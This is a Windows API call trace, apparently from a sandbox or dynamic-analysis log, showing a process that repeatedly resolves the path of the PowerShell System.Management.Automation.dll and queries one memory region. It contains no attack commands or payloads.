[0079.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.897] VirtualQuery (in: lpAddress=0xcb850, lpBuffer=0xcc710, dwLength=0x30 | out: lpBuffer=0xcc710*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.897] VirtualQuery (in: lpAddress=0xcb850, lpBuffer=0xcc710, dwLength=0x30 | out: lpBuffer=0xcc710*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.897] VirtualQuery (in: lpAddress=0xcb850, lpBuffer=0xcc710, dwLength=0x30 | out: lpBuffer=0xcc710*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.898] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.898] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.898] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.898] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.898] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.898] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.899] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.899] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.899] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.899] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.899] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.899] VirtualQuery (in: lpAddress=0xcb480, lpBuffer=0xcc340, dwLength=0x30 | out: lpBuffer=0xcc340*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.899] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.900] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.900] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.900] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.900] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xccdad28b, Data2=0x40b7, Data3=0x495f, Data4=([0]=0xb7, [1]=0x3, [2]=0x25, [3]=0x1d, [4]=0x54, [5]=0xf7, [6]=0xda, [7]=0xe5))) returned 0x0
[0079.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.901] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x35ca04eb, Data2=0x510e, Data3=0x4f26, Data4=([0]=0x82, [1]=0x6b, [2]=0xad, [3]=0x62, [4]=0x9d, [5]=0xb4, [6]=0xa2, [7]=0x42))) returned 0x0
[0079.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
